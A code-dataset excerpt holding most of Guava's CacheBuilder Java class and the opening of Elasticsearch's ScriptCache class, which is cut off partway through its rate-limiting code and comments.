* @author Kevin Bourrillion
* @since 10.0
*/
@GwtCompatible(emulated = true)
@ElementTypesAreNonnullByDefault
public final class CacheBuilder<K, V> {
private static final int DEFAULT_INITIAL_CAPACITY = 16;
private static final int DEFAULT_CONCURRENCY_LEVEL = 4;
@SuppressWarnings("GoodTime") // should be a java.time.Duration
private static final int DEFAULT_EXPIRATION_NANOS = 0;
@SuppressWarnings("GoodTime") // should be a java.time.Duration
private static final int DEFAULT_REFRESH_NANOS = 0;
static final Supplier<? extends StatsCounter> NULL_STATS_COUNTER =
Suppliers.ofInstance(
new StatsCounter() {
@Override
public void recordHits(int count) {}
@Override
public void recordMisses(int count) {}
@SuppressWarnings("GoodTime") // b/122668874
@Override
public void recordLoadSuccess(long loadTime) {}
@SuppressWarnings("GoodTime") // b/122668874
@Override
public void recordLoadException(long loadTime) {}
@Override
public void recordEviction() {}
@Override
public CacheStats snapshot() {
return EMPTY_STATS;
}
});
static final CacheStats EMPTY_STATS = new CacheStats(0, 0, 0, 0, 0, 0);
/*
* We avoid using a method reference or lambda here for now:
*
* - method reference: Inside Google, CacheBuilder is used from the implementation of a custom
* ClassLoader that is sometimes used as a system classloader. That's a problem because
* method-reference linking tries to look up the system classloader, and it fails because there
* isn't one yet.
*
* - lambda: Outside Google, we got a report of a similar problem in
* https://github.com/google/guava/issues/6565
*/
@SuppressWarnings("AnonymousToLambda")
static final Supplier<StatsCounter> CACHE_STATS_COUNTER =
new Supplier<StatsCounter>() {
@Override
public StatsCounter get() {
return new SimpleStatsCounter();
}
};
enum NullListener implements RemovalListener<Object, Object> {
INSTANCE;
@Override
public void onRemoval(RemovalNotification<Object, Object> notification) {}
}
enum OneWeigher implements Weigher<Object, Object> {
INSTANCE;
@Override
public int weigh(Object key, Object value) {
return 1;
}
}
static final Ticker NULL_TICKER =
new Ticker() {
@Override
public long read() {
return 0;
}
};
// We use a holder class to delay initialization: https://github.com/google/guava/issues/6566
private static final class LoggerHolder {
static final Logger logger = Logger.getLogger(CacheBuilder.class.getName());
}
static final int UNSET_INT = -1;
boolean strictParsing = true;
int initialCapacity = UNSET_INT;
int concurrencyLevel = UNSET_INT;
long maximumSize = UNSET_INT;
long maximumWeight = UNSET_INT;
@CheckForNull Weigher<? super K, ? super V> weigher;
@CheckForNull Strength keyStrength;
@CheckForNull Strength valueStrength;
@SuppressWarnings("GoodTime") // should be a java.time.Duration
long expireAfterWriteNanos = UNSET_INT;
@SuppressWarnings("GoodTime") // should be a java.time.Duration
long expireAfterAccessNanos = UNSET_INT;
@SuppressWarnings("GoodTime") // should be a java.time.Duration
long refreshNanos = UNSET_INT;
@CheckForNull Equivalence<Object> keyEquivalence;
@CheckForNull Equivalence<Object> valueEquivalence;
@CheckForNull RemovalListener<? super K, ? super V> removalListener;
@CheckForNull Ticker ticker;
Supplier<? extends StatsCounter> statsCounterSupplier = NULL_STATS_COUNTER;
private CacheBuilder() {}
/**
* Constructs a new {@code CacheBuilder} instance with default settings, including strong keys,
* strong values, and no automatic eviction of any kind.
*
* <p>Note that while this return type is {@code CacheBuilder<Object, Object>}, type parameters on
* the {@link #build} methods allow you to create a cache of any key and value type desired.
*/
public static CacheBuilder<Object, Object> newBuilder() {
return new CacheBuilder<>();
}
/**
* Constructs a new {@code CacheBuilder} instance with the settings specified in {@code spec}.
*
* @since 12.0
*/
@GwtIncompatible // To be supported
public static CacheBuilder<Object, Object> from(CacheBuilderSpec spec) {
return spec.toCacheBuilder().lenientParsing();
}
/**
* Constructs a new {@code CacheBuilder} instance with the settings specified in {@code spec}.
* This is especially useful for command-line configuration of a {@code CacheBuilder}.
*
* @param spec a String in the format specified by {@link CacheBuilderSpec}
* @since 12.0
*/
@GwtIncompatible // To be supported
public static CacheBuilder<Object, Object> from(String spec) {
return from(CacheBuilderSpec.parse(spec));
}
/**
* Enables lenient parsing. Useful for tests and spec parsing.
*
* @return this {@code CacheBuilder} instance (for chaining)
*/
@GwtIncompatible // To be supported
@CanIgnoreReturnValue
CacheBuilder<K, V> lenientParsing() {
strictParsing = false;
return this;
}
/**
* Sets a custom {@code Equivalence} strategy for comparing keys.
*
* <p>By default, the cache uses {@link Equivalence#identity} to determine key equality when
* {@link #weakKeys} is specified, and {@link Equivalence#equals()} otherwise.
*
* @return this {@code CacheBuilder} instance (for chaining)
*/
@GwtIncompatible // To be supported
@CanIgnoreReturnValue
CacheBuilder<K, V> keyEquivalence(Equivalence<Object> equivalence) {
checkState(keyEquivalence == null, "key equivalence was already set to %s", keyEquivalence);
keyEquivalence = checkNotNull(equivalence);
return this;
}
Equivalence<Object> getKeyEquivalence() {
return MoreObjects.firstNonNull(keyEquivalence, getKeyStrength().defaultEquivalence());
}
/**
* Sets a custom {@code Equivalence} strategy for comparing values.
*
* <p>By default, the cache uses {@link Equivalence#identity} to determine value equality when
* {@link #weakValues} or {@link #softValues} is specified, and {@link Equivalence#equals()}
* otherwise.
*
* @return this {@code CacheBuilder} instance (for chaining)
*/
@GwtIncompatible // To be supported
@CanIgnoreReturnValue
CacheBuilder<K, V> valueEquivalence(Equivalence<Object> equivalence) {
checkState(
valueEquivalence == null, "value equivalence was already set to %s", valueEquivalence);
this.valueEquivalence = checkNotNull(equivalence);
return this;
}
Equivalence<Object> getValueEquivalence() {
return MoreObjects.firstNonNull(valueEquivalence, getValueStrength().defaultEquivalence());
}
/**
* Sets the minimum total size for the internal hash tables. For example, if the initial capacity
* is {@code 60}, and the concurrency level is {@code 8}, then eight segments are created, each
* having a hash table of size eight. Providing a large enough estimate at construction time
* avoids the need for expensive resizing operations later, but setting this value unnecessarily
* high wastes memory.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code initialCapacity} is negative
* @throws IllegalStateException if an initial capacity was already set
*/
@CanIgnoreReturnValue
public CacheBuilder<K, V> initialCapacity(int initialCapacity) {
checkState(
this.initialCapacity == UNSET_INT,
"initial capacity was already set to %s",
this.initialCapacity);
checkArgument(initialCapacity >= 0);
this.initialCapacity = initialCapacity;
return this;
}
int getInitialCapacity() {
return (initialCapacity == UNSET_INT) ? DEFAULT_INITIAL_CAPACITY : initialCapacity;
}
/**
* Guides the allowed concurrency among update operations. Used as a hint for internal sizing. The
* table is internally partitioned to try to permit the indicated number of concurrent updates
* without contention. Because assignment of entries to these partitions is not necessarily
* uniform, the actual concurrency observed may vary. Ideally, you should choose a value to
* accommodate as many threads as will ever concurrently modify the table. Using a significantly
* higher value than you need can waste space and time, and a significantly lower value can lead
* to thread contention. But overestimates and underestimates within an order of magnitude do not
* usually have much noticeable impact. A value of one permits only one thread to modify the cache
* at a time, but since read operations and cache loading computations can proceed concurrently,
* this still yields higher concurrency than full synchronization.
*
* <p>Defaults to 4. <b>Note:</b>The default may change in the future. If you care about this
* value, you should always choose it explicitly.
*
* <p>The current implementation uses the concurrency level to create a fixed number of hashtable
* segments, each governed by its own write lock. The segment lock is taken once for each explicit
* write, and twice for each cache loading computation (once prior to loading the new value, and
* once after loading completes). Much internal cache management is performed at the segment
* granularity. For example, access queues and write queues are kept per segment when they are
* required by the selected eviction algorithm. As such, when writing unit tests it is not
* uncommon to specify {@code concurrencyLevel(1)} in order to achieve more deterministic eviction
* behavior.
*
* <p>Note that future implementations may abandon segment locking in favor of more advanced
* concurrency controls.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code concurrencyLevel} is nonpositive
* @throws IllegalStateException if a concurrency level was already set
*/
@CanIgnoreReturnValue
public CacheBuilder<K, V> concurrencyLevel(int concurrencyLevel) {
checkState(
this.concurrencyLevel == UNSET_INT,
"concurrency level was already set to %s",
this.concurrencyLevel);
checkArgument(concurrencyLevel > 0);
this.concurrencyLevel = concurrencyLevel;
return this;
}
int getConcurrencyLevel() {
return (concurrencyLevel == UNSET_INT) ? DEFAULT_CONCURRENCY_LEVEL : concurrencyLevel;
}
/**
* Specifies the maximum number of entries the cache may contain.
*
* <p>Note that the cache <b>may evict an entry before this limit is exceeded</b>. For example, in
* the current implementation, when {@code concurrencyLevel} is greater than {@code 1}, each
* resulting segment inside the cache <i>independently</i> limits its own size to approximately
* {@code maximumSize / concurrencyLevel}.
*
* <p>When eviction is necessary, the cache evicts entries that are less likely to be used again.
* For example, the cache may evict an entry because it hasn't been used recently or very often.
*
* <p>If {@code maximumSize} is zero, elements will be evicted immediately after being loaded into
* cache. This can be useful in testing, or to disable caching temporarily.
*
* <p>This feature cannot be used in conjunction with {@link #maximumWeight}.
*
* @param maximumSize the maximum size of the cache
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code maximumSize} is negative
* @throws IllegalStateException if a maximum size or weight was already set
*/
@CanIgnoreReturnValue
public CacheBuilder<K, V> maximumSize(long maximumSize) {
checkState(
this.maximumSize == UNSET_INT, "maximum size was already set to %s", this.maximumSize);
checkState(
this.maximumWeight == UNSET_INT,
"maximum weight was already set to %s",
this.maximumWeight);
checkState(this.weigher == null, "maximum size can not be combined with weigher");
checkArgument(maximumSize >= 0, "maximum size must not be negative");
this.maximumSize = maximumSize;
return this;
}
/**
* Specifies the maximum weight of entries the cache may contain. Weight is determined using the
* {@link Weigher} specified with {@link #weigher}, and use of this method requires a
* corresponding call to {@link #weigher} prior to calling {@link #build}.
*
* <p>Note that the cache <b>may evict an entry before this limit is exceeded</b>. For example, in
* the current implementation, when {@code concurrencyLevel} is greater than {@code 1}, each
* resulting segment inside the cache <i>independently</i> limits its own weight to approximately
* {@code maximumWeight / concurrencyLevel}.
*
* <p>When eviction is necessary, the cache evicts entries that are less likely to be used again.
* For example, the cache may evict an entry because it hasn't been used recently or very often.
*
* <p>If {@code maximumWeight} is zero, elements will be evicted immediately after being loaded
* into cache. This can be useful in testing, or to disable caching temporarily.
*
* <p>Note that weight is only used to determine whether the cache is over capacity; it has no
* effect on selecting which entry should be evicted next.
*
* <p>This feature cannot be used in conjunction with {@link #maximumSize}.
*
* @param maximumWeight the maximum total weight of entries the cache may contain
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code maximumWeight} is negative
* @throws IllegalStateException if a maximum weight or size was already set
* @since 11.0
*/
@GwtIncompatible // To be supported
@CanIgnoreReturnValue
public CacheBuilder<K, V> maximumWeight(long maximumWeight) {
checkState(
this.maximumWeight == UNSET_INT,
"maximum weight was already set to %s",
this.maximumWeight);
checkState(
this.maximumSize == UNSET_INT, "maximum size was already set to %s", this.maximumSize);
checkArgument(maximumWeight >= 0, "maximum weight must not be negative");
this.maximumWeight = maximumWeight;
return this;
}
/**
* Specifies the weigher to use in determining the weight of entries. Entry weight is taken into
* consideration by {@link #maximumWeight(long)} when determining which entries to evict, and use
* of this method requires a corresponding call to {@link #maximumWeight(long)} prior to calling
* {@link #build}. Weights are measured and recorded when entries are inserted into the cache, and
* are thus effectively static during the lifetime of a cache entry.
*
* <p>When the weight of an entry is zero it will not be considered for size-based eviction
* (though it still may be evicted by other means).
*
* <p><b>Important note:</b> Instead of returning <em>this</em> as a {@code CacheBuilder}
* instance, this method returns {@code CacheBuilder<K1, V1>}. From this point on, either the
* original reference or the returned reference may be used to complete configuration and build
* the cache, but only the "generic" one is type-safe. That is, it will properly prevent you from
* building caches whose key or value types are incompatible with the types accepted by the
* weigher already provided; the {@code CacheBuilder} type cannot do this. For best results,
* simply use the standard method-chaining idiom, as illustrated in the documentation at top,
* configuring a {@code CacheBuilder} and building your {@link Cache} all in a single statement.
*
* <p><b>Warning:</b> if you ignore the above advice, and use this {@code CacheBuilder} to build a
* cache whose key or value type is incompatible with the weigher, you will likely experience a
* {@link ClassCastException} at some <i>undefined</i> point in the future.
*
* @param weigher the weigher to use in calculating the weight of cache entries
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalStateException if a weigher was already set or {@link #maximumSize(long)} was
* previously called
* @since 11.0
*/
@GwtIncompatible // To be supported
@CanIgnoreReturnValue // TODO(b/27479612): consider removing this
public <K1 extends K, V1 extends V> CacheBuilder<K1, V1> weigher(
Weigher<? super K1, ? super V1> weigher) {
checkState(this.weigher == null);
if (strictParsing) {
checkState(
this.maximumSize == UNSET_INT,
"weigher can not be combined with maximum size (%s provided)",
this.maximumSize);
}
// safely limiting the kinds of caches this can produce
@SuppressWarnings("unchecked")
CacheBuilder<K1, V1> me = (CacheBuilder<K1, V1>) this;
me.weigher = checkNotNull(weigher);
return me;
}
long getMaximumWeight() {
if (expireAfterWriteNanos == 0 || expireAfterAccessNanos == 0) {
return 0;
}
return (weigher == null) ? maximumSize : maximumWeight;
}
// Make a safe contravariant cast now so we don't have to do it over and over.
@SuppressWarnings("unchecked")
<K1 extends K, V1 extends V> Weigher<K1, V1> getWeigher() {
return (Weigher<K1, V1>) MoreObjects.firstNonNull(weigher, OneWeigher.INSTANCE);
}
/**
* Specifies that each key (not value) stored in the cache should be wrapped in a {@link
* WeakReference} (by default, strong references are used).
*
* <p><b>Warning:</b> when this method is used, the resulting cache will use identity ({@code ==})
* comparison to determine equality of keys. Its {@link Cache#asMap} view will therefore
* technically violate the {@link Map} specification (in the same way that {@link IdentityHashMap}
* does).
*
* <p>Entries with keys that have been garbage collected may be counted in {@link Cache#size}, but
* will never be visible to read or write operations; such entries are cleaned up as part of the
* routine maintenance described in the class javadoc.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalStateException if the key strength was already set
*/
@GwtIncompatible // java.lang.ref.WeakReference
@CanIgnoreReturnValue
public CacheBuilder<K, V> weakKeys() {
return setKeyStrength(Strength.WEAK);
}
@CanIgnoreReturnValue
CacheBuilder<K, V> setKeyStrength(Strength strength) {
checkState(keyStrength == null, "Key strength was already set to %s", keyStrength);
keyStrength = checkNotNull(strength);
return this;
}
Strength getKeyStrength() {
return MoreObjects.firstNonNull(keyStrength, Strength.STRONG);
}
/**
* Specifies that each value (not key) stored in the cache should be wrapped in a {@link
* WeakReference} (by default, strong references are used).
*
* <p>Weak values will be garbage collected once they are weakly reachable. This makes them a poor
* candidate for caching; consider {@link #softValues} instead.
*
* <p><b>Note:</b> when this method is used, the resulting cache will use identity ({@code ==})
* comparison to determine equality of values.
*
* <p>Entries with values that have been garbage collected may be counted in {@link Cache#size},
* but will never be visible to read or write operations; such entries are cleaned up as part of
* the routine maintenance described in the class javadoc.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalStateException if the value strength was already set
*/
@GwtIncompatible // java.lang.ref.WeakReference
@CanIgnoreReturnValue
public CacheBuilder<K, V> weakValues() {
return setValueStrength(Strength.WEAK);
}
/**
* Specifies that each value (not key) stored in the cache should be wrapped in a {@link
* SoftReference} (by default, strong references are used). Softly-referenced objects will be
* garbage-collected in a <i>globally</i> least-recently-used manner, in response to memory
* demand.
*
* <p><b>Warning:</b> in most circumstances it is better to set a per-cache {@linkplain
* #maximumSize(long) maximum size} instead of using soft references. You should only use this
* method if you are well familiar with the practical consequences of soft references.
*
* <p><b>Note:</b> when this method is used, the resulting cache will use identity ({@code ==})
* comparison to determine equality of values.
*
* <p>Entries with values that have been garbage collected may be counted in {@link Cache#size},
* but will never be visible to read or write operations; such entries are cleaned up as part of
* the routine maintenance described in the class javadoc.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalStateException if the value strength was already set
*/
@GwtIncompatible // java.lang.ref.SoftReference
@CanIgnoreReturnValue
public CacheBuilder<K, V> softValues() {
return setValueStrength(Strength.SOFT);
}
@CanIgnoreReturnValue
CacheBuilder<K, V> setValueStrength(Strength strength) {
checkState(valueStrength == null, "Value strength was already set to %s", valueStrength);
valueStrength = checkNotNull(strength);
return this;
}
Strength getValueStrength() {
return MoreObjects.firstNonNull(valueStrength, Strength.STRONG);
}
/**
* Specifies that each entry should be automatically removed from the cache once a fixed duration
* has elapsed after the entry's creation, or the most recent replacement of its value.
*
* <p>When {@code duration} is zero, this method hands off to {@link #maximumSize(long)
* maximumSize}{@code (0)}, ignoring any otherwise-specified maximum size or weight. This can be
* useful in testing, or to disable caching temporarily without a code change.
*
* <p>Expired entries may be counted in {@link Cache#size}, but will never be visible to read or
* write operations. Expired entries are cleaned up as part of the routine maintenance described
* in the class javadoc.
*
* @param duration the length of time after an entry is created that it should be automatically
* removed
* @param unit the unit that {@code duration} is expressed in
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code duration} is negative
* @throws IllegalStateException if {@link #expireAfterWrite} was already set
*/
@SuppressWarnings("GoodTime") // should accept a java.time.Duration
@CanIgnoreReturnValue
public CacheBuilder<K, V> expireAfterWrite(long duration, TimeUnit unit) {
checkState(
expireAfterWriteNanos == UNSET_INT,
"expireAfterWrite was already set to %s ns",
expireAfterWriteNanos);
checkArgument(duration >= 0, "duration cannot be negative: %s %s", duration, unit);
this.expireAfterWriteNanos = unit.toNanos(duration);
return this;
}
@SuppressWarnings("GoodTime") // nanos internally, should be Duration
long getExpireAfterWriteNanos() {
return (expireAfterWriteNanos == UNSET_INT) ? DEFAULT_EXPIRATION_NANOS : expireAfterWriteNanos;
}
/**
* Specifies that each entry should be automatically removed from the cache once a fixed duration
* has elapsed after the entry's creation, the most recent replacement of its value, or its last
* access. Access time is reset by all cache read and write operations (including {@code
* Cache.asMap().get(Object)} and {@code Cache.asMap().put(K, V)}), but not by {@code
* containsKey(Object)}, nor by operations on the collection-views of {@link Cache#asMap}. So, for
* example, iterating through {@code Cache.asMap().entrySet()} does not reset access time for the
* entries you retrieve.
*
* <p>When {@code duration} is zero, this method hands off to {@link #maximumSize(long)
* maximumSize}{@code (0)}, ignoring any otherwise-specified maximum size or weight. This can be
* useful in testing, or to disable caching temporarily without a code change.
*
* <p>Expired entries may be counted in {@link Cache#size}, but will never be visible to read or
* write operations. Expired entries are cleaned up as part of the routine maintenance described
* in the class javadoc.
*
* @param duration the length of time after an entry is last accessed that it should be
* automatically removed
* @param unit the unit that {@code duration} is expressed in
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code duration} is negative
* @throws IllegalStateException if {@link #expireAfterAccess} was already set
*/
@SuppressWarnings("GoodTime") // should accept a java.time.Duration
@CanIgnoreReturnValue
public CacheBuilder<K, V> expireAfterAccess(long duration, TimeUnit unit) {
checkState(
expireAfterAccessNanos == UNSET_INT,
"expireAfterAccess was already set to %s ns",
expireAfterAccessNanos);
checkArgument(duration >= 0, "duration cannot be negative: %s %s", duration, unit);
this.expireAfterAccessNanos = unit.toNanos(duration);
return this;
}
@SuppressWarnings("GoodTime") // nanos internally, should be Duration
long getExpireAfterAccessNanos() {
return (expireAfterAccessNanos == UNSET_INT)
? DEFAULT_EXPIRATION_NANOS
: expireAfterAccessNanos;
}
/**
* Specifies that active entries are eligible for automatic refresh once a fixed duration has
* elapsed after the entry's creation, or the most recent replacement of its value. The semantics
* of refreshes are specified in {@link LoadingCache#refresh}, and are performed by calling {@link
* CacheLoader#reload}.
*
* <p>As the default implementation of {@link CacheLoader#reload} is synchronous, it is
* recommended that users of this method override {@link CacheLoader#reload} with an asynchronous
* implementation; otherwise refreshes will be performed during unrelated cache read and write
* operations.
*
* <p>Currently automatic refreshes are performed when the first stale request for an entry
* occurs. The request triggering refresh will make a synchronous call to {@link
* CacheLoader#reload}
* and immediately return the new value if the returned future is complete, and the old value
* otherwise.
*
* <p><b>Note:</b> <i>all exceptions thrown during refresh will be logged and then swallowed</i>.
*
* @param duration the length of time after an entry is created that it should be considered
* stale, and thus eligible for refresh
* @param unit the unit that {@code duration} is expressed in
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalArgumentException if {@code duration} is negative
* @throws IllegalStateException if {@link #refreshAfterWrite} was already set
* @since 11.0
*/
@GwtIncompatible // To be supported (synchronously).
@SuppressWarnings("GoodTime") // should accept a java.time.Duration
@CanIgnoreReturnValue
public CacheBuilder<K, V> refreshAfterWrite(long duration, TimeUnit unit) {
checkNotNull(unit);
checkState(refreshNanos == UNSET_INT, "refresh was already set to %s ns", refreshNanos);
checkArgument(duration > 0, "duration must be positive: %s %s", duration, unit);
this.refreshNanos = unit.toNanos(duration);
return this;
}
@SuppressWarnings("GoodTime") // nanos internally, should be Duration
long getRefreshNanos() {
return (refreshNanos == UNSET_INT) ? DEFAULT_REFRESH_NANOS : refreshNanos;
}
/**
* Specifies a nanosecond-precision time source for this cache. By default, {@link
* System#nanoTime} is used.
*
* <p>The primary intent of this method is to facilitate testing of caches with a fake or mock
* time source.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalStateException if a ticker was already set
*/
@CanIgnoreReturnValue
public CacheBuilder<K, V> ticker(Ticker ticker) {
checkState(this.ticker == null);
this.ticker = checkNotNull(ticker);
return this;
}
Ticker getTicker(boolean recordsTime) {
if (ticker != null) {
return ticker;
}
return recordsTime ? Ticker.systemTicker() : NULL_TICKER;
}
/**
* Specifies a listener instance that caches should notify each time an entry is removed for any
* {@linkplain RemovalCause reason}. Each cache created by this builder will invoke this listener
* as part of the routine maintenance described in the class documentation above.
*
* <p><b>Warning:</b> after invoking this method, do not continue to use <i>this</i> cache builder
* reference; instead use the reference this method <i>returns</i>. At runtime, these point to the
* same instance, but only the returned reference has the correct generic type information to
* ensure type safety. For best results, use the standard method-chaining idiom illustrated in the
* class documentation above, configuring a builder and building your cache in a single statement.
* Failure to heed this advice can result in a {@link ClassCastException} being thrown by a cache
* operation at some <i>undefined</i> point in the future.
*
* <p><b>Warning:</b> any exception thrown by {@code listener} will <i>not</i> be propagated to
* the {@code Cache} user, only logged via a {@link Logger}.
*
* @return the cache builder reference that should be used instead of {@code this} for any
* remaining configuration and cache building
* @return this {@code CacheBuilder} instance (for chaining)
* @throws IllegalStateException if a removal listener was already set
*/
public <K1 extends K, V1 extends V> CacheBuilder<K1, V1> removalListener(
RemovalListener<? super K1, ? super V1> listener) {
checkState(this.removalListener == null);
// safely limiting the kinds of caches this can produce
@SuppressWarnings("unchecked")
CacheBuilder<K1, V1> me = (CacheBuilder<K1, V1>) this;
me.removalListener = checkNotNull(listener);
return me;
}
// Make a safe contravariant cast now so we don't have to do it over and over.
@SuppressWarnings("unchecked")
<K1 extends K, V1 extends V> RemovalListener<K1, V1> getRemovalListener() {
return (RemovalListener<K1, V1>)
MoreObjects.firstNonNull(removalListener, NullListener.INSTANCE);
}
/**
* Enable the accumulation of {@link CacheStats} during the operation of the cache. Without this
* {@link Cache#stats} will return zero for all statistics. Note that recording stats requires
* bookkeeping to be performed with each operation, and thus imposes a performance penalty on
* cache operation.
*
* @return this {@code CacheBuilder} instance (for chaining)
* @since 12.0 (previously, stats collection was automatic)
*/
@CanIgnoreReturnValue
public CacheBuilder<K, V> recordStats() {
statsCounterSupplier = CACHE_STATS_COUNTER;
return this;
}
boolean isRecordingStats() {
return statsCounterSupplier == CACHE_STATS_COUNTER;
}
Supplier<? extends StatsCounter> getStatsCounterSupplier() {
return statsCounterSupplier;
}
/**
* Builds a cache, which either returns an already-loaded value for a given key or atomically
* computes or retrieves it using the supplied {@code CacheLoader}. If another thread is currently
* loading the value for this key, simply waits for that thread to finish and returns its loaded
* value. Note that multiple threads can concurrently load values for distinct keys.
*
* <p>This method does not alter the state of this {@code CacheBuilder} instance, so it can be
* invoked again to create multiple independent caches.
*
* @param loader the cache loader used to obtain new values
* @return a cache having the requested features
*/
public <K1 extends K, V1 extends V> LoadingCache<K1, V1> build(
CacheLoader<? super K1, V1> loader) {
checkWeightWithWeigher();
return new LocalCache.LocalLoadingCache<>(this, loader);
}
/**
* Builds a cache which does not automatically load values when keys are requested.
*
* <p>Consider {@link #build(CacheLoader)} instead, if it is feasible to implement a {@code
* CacheLoader}.
*
* <p>This method does not alter the state of this {@code CacheBuilder} instance, so it can be
* invoked again to create multiple independent caches.
*
* @return a cache having the requested features
* @since 11.0
*/
public <K1 extends K, V1 extends V> Cache<K1, V1> build() {
checkWeightWithWeigher();
checkNonLoadingCache();
return new LocalCache.LocalManualCache<>(this);
}
private void checkNonLoadingCache() {
checkState(refreshNanos == UNSET_INT, "refreshAfterWrite requires a LoadingCache");
}
private void checkWeightWithWeigher() {
if (weigher == null) {
checkState(maximumWeight == UNSET_INT, "maximumWeight requires weigher");
} else {
if (strictParsing) {
checkState(maximumWeight != UNSET_INT, "weigher requires maximumWeight");
} else {
if (maximumWeight == UNSET_INT) {
LoggerHolder.logger.log(
Level.WARNING, "ignoring weigher specified without maximumWeight");
}
}
}
}
/**
* Returns a string representation for this CacheBuilder instance. The exact form of the returned
* string is not specified.
*/
@Override
public String toString() {
MoreObjects.ToStringHelper s = MoreObjects.toStringHelper(this);
if (initialCapacity != UNSET_INT) {
s.add("initialCapacity", initialCapacity);
}
if (concurrencyLevel != UNSET_INT) {
s.add("concurrencyLevel", concurrencyLevel);
}
if (maximumSize != UNSET_INT) {
s.add("maximumSize", maximumSize);
}
if (maximumWeight != UNSET_INT) {
s.add("maximumWeight", maximumWeight);
}
if (expireAfterWriteNanos != UNSET_INT) {
s.add("expireAfterWrite", expireAfterWriteNanos + "ns");
}
if (expireAfterAccessNanos != UNSET_INT) {
s.add("expireAfterAccess", expireAfterAccessNanos + "ns");
}
if (keyStrength != null) {
s.add("keyStrength", Ascii.toLowerCase(keyStrength.toString()));
}
if (valueStrength != null) {
s.add("valueStrength", Ascii.toLowerCase(valueStrength.toString()));
}
if (keyEquivalence != null) {
s.addValue("keyEquivalence");
}
if (valueEquivalence != null) {
s.addValue("valueEquivalence");
}
if (removalListener != null) {
s.addValue("removalListener");
}
return s.toString();
}
}
| google/guava | android/guava/src/com/google/common/cache/CacheBuilder.java |
1,129 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.script;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.elasticsearch.common.breaker.CircuitBreaker;
import org.elasticsearch.common.breaker.CircuitBreakingException;
import org.elasticsearch.common.cache.Cache;
import org.elasticsearch.common.cache.CacheBuilder;
import org.elasticsearch.common.cache.RemovalListener;
import org.elasticsearch.common.cache.RemovalNotification;
import org.elasticsearch.core.TimeValue;
import org.elasticsearch.core.Tuple;
import java.util.Map;
import java.util.Objects;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.atomic.AtomicReference;
import java.util.function.LongSupplier;
/**
* Script cache and compilation rate limiter.
*/
public class ScriptCache {
private static final Logger logger = LogManager.getLogger(ScriptService.class);
public static final CompilationRate UNLIMITED_COMPILATION_RATE = new CompilationRate(0, TimeValue.ZERO);
private final Cache<CacheKey, Object> cache;
private final ScriptMetrics scriptMetrics;
final AtomicReference<TokenBucketState> tokenBucketState;
// Cache settings or derived from settings
final int cacheSize;
final TimeValue cacheExpire;
final CompilationRate rate;
private final double compilesAllowedPerNano;
private final String contextRateSetting;
ScriptCache(
int cacheMaxSize,
TimeValue cacheExpire,
CompilationRate maxCompilationRate,
String contextRateSetting,
LongSupplier timeProvider
) {
this.cacheSize = cacheMaxSize;
this.cacheExpire = cacheExpire;
this.contextRateSetting = contextRateSetting;
CacheBuilder<CacheKey, Object> cacheBuilder = CacheBuilder.builder();
if (this.cacheSize >= 0) {
cacheBuilder.setMaximumWeight(this.cacheSize);
}
if (this.cacheExpire.getNanos() != 0) {
cacheBuilder.setExpireAfterAccess(this.cacheExpire);
}
logger.debug("using script cache with max_size [{}], expire [{}]", this.cacheSize, this.cacheExpire);
this.cache = cacheBuilder.removalListener(new ScriptCacheRemovalListener()).build();
this.rate = maxCompilationRate;
this.compilesAllowedPerNano = ((double) rate.count) / rate.time.nanos();
this.scriptMetrics = new ScriptMetrics(timeProvider);
this.tokenBucketState = new AtomicReference<TokenBucketState>(new TokenBucketState(this.rate.count));
}
<FactoryType> FactoryType compile(
ScriptContext<FactoryType> context,
ScriptEngine scriptEngine,
String id,
String idOrCode,
ScriptType type,
Map<String, String> options
) {
String lang = scriptEngine.getType();
CacheKey cacheKey = new CacheKey(lang, idOrCode, context.name, options);
// Relying on computeIfAbsent to avoid multiple threads from compiling the same script
try {
return context.factoryClazz.cast(cache.computeIfAbsent(cacheKey, key -> {
// Either an un-cached inline script or indexed script
// If the script type is inline the name will be the same as the code for identification in exceptions
// but give the script engine the chance to be better, give it separate name + source code
// for the inline case, then its anonymous: null.
if (logger.isTraceEnabled()) {
logger.trace(
"context [{}]: compiling script, type: [{}], lang: [{}], options: [{}]",
context.name,
type,
lang,
options
);
}
if (context.compilationRateLimited) {
// Check whether too many compilations have happened
checkCompilationLimit();
}
Object compiledScript = scriptEngine.compile(id, idOrCode, context, options);
// Since the cache key is the script content itself we don't need to
// invalidate/check the cache if an indexed script changes.
scriptMetrics.onCompilation();
return compiledScript;
}));
} catch (ExecutionException executionException) {
Throwable cause = executionException.getCause();
if (cause instanceof ScriptException) {
throw (ScriptException) cause;
} else if (cause instanceof Exception) {
throw new GeneralScriptException("Failed to compile " + type + " script [" + id + "] using lang [" + lang + "]", cause);
} else {
rethrow(cause);
throw new AssertionError(cause);
}
}
}
/** Hack to rethrow unknown Exceptions from compile: */
@SuppressWarnings("unchecked")
static <T extends Throwable> void rethrow(Throwable t) throws T {
throw (T) t;
}
public ScriptStats stats() {
return scriptMetrics.stats();
}
public ScriptContextStats stats(String context) {
return scriptMetrics.stats(context);
}
/**
* Check whether there have been too many compilations within the last minute, throwing a circuit breaking exception if so.
* This is a variant of the token bucket algorithm: https://en.wikipedia.org/wiki/Token_bucket
*
* It can be thought of as a bucket with water, every time the bucket is checked, water is added proportional to the amount of time that
* elapsed since the last time it was checked. If there is enough water, some is removed and the request is allowed. If there is not
